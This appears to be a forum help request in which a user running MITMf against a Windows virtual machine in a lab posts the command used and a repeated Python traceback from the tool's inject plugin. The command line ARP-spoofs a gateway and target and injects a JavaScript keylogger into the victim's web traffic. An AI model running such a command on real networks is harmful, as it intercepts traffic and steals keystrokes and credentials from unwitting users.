MITMf Error

Jun 11, 2016 02:25 PM

I am using this command mitmf -i wlan0 --arp --spoof --gateway 192.168.1.1 --target 192.168.1.108 --jskeylogger The tartget is windows on my VM ware station.Using dual boot with kali linux and get this error when start browsing.

2016-06-11 17:23:07 ProxyPlugins Exception occurred in hooked function

Traceback (most recent call last):

File "/usr/share/mitmf/core/proxyplugins.py", line 112, in hook

a = f(*args)

File "/usr/share/mitmf/plugins/inject.py", line 65, in response

mime = response.headers'Content-Type'

AttributeError: ClientRequest instance has no attribute 'headers'

2016-06-11 17:23:07 ProxyPlugins Exception occurred in hooked function

Traceback (most recent call last):

File "/usr/share/mitmf/core/proxyplugins.py", line 112, in hook

a = f(*args)

File "/usr/share/mitmf/plugins/inject.py", line 65, in response

mime = response.headers'Content-Type'

AttributeError: ClientRequest instance has no attribute 'headers'

2016-06-11 17:23:09 ProxyPlugins Exception occurred in hooked function

Traceback (most recent call last):

File "/usr/share/mitmf/core/proxyplugins.py", line 112, in hook

a = f(*args)

File "/usr/share/mitmf/plugins/inject.py", line 65, in response

mime = response.headers'Content-Type'

AttributeError: ClientRequest instance has no attribute 'headers'

2016-06-11 17:23:10 ProxyPlugins Exception occurred in hooked function

Traceback (most recent call last):

File "/usr/share/mitmf/core/proxyplugins.py", line 112, in hook

a = f(*args)

File "/usr/share/mitmf/plugins/inject.py", line 65, in response

mime = response.headers'Content-Type'

AttributeError: ClientRequest instance has no attribute 'headers'

2016-06-11 17:23:10 ProxyPlugins Exception occurred in hooked function

Traceback (most recent call last):

File "/usr/share/mitmf/core/proxyplugins.py", line 112, in hook

a = f(*args)

File "/usr/share/mitmf/plugins/inject.py", line 65, in response

mime = response.headers'Content-Type'

AttributeError: ClientRequest instance has no attribute 'headers'

2016-06-11 17:23:12 ProxyPlugins Exception occurred in hooked function

Traceback (most recent call last):

File "/usr/share/mitmf/core/proxyplugins.py", line 112, in hook

a = f(*args)

File "/usr/share/mitmf/plugins/inject.py", line 65, in response

mime = response.headers'Content-Type'

AttributeError: ClientRequest instance has no attribute 'headers'

Related Articles

637263493835297420.jpg

How to Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)

636455706472146367.jpg

How to Hide DDE-Based Attacks in MS Word

Comments

No Comments Exist

Be the first, drop a comment!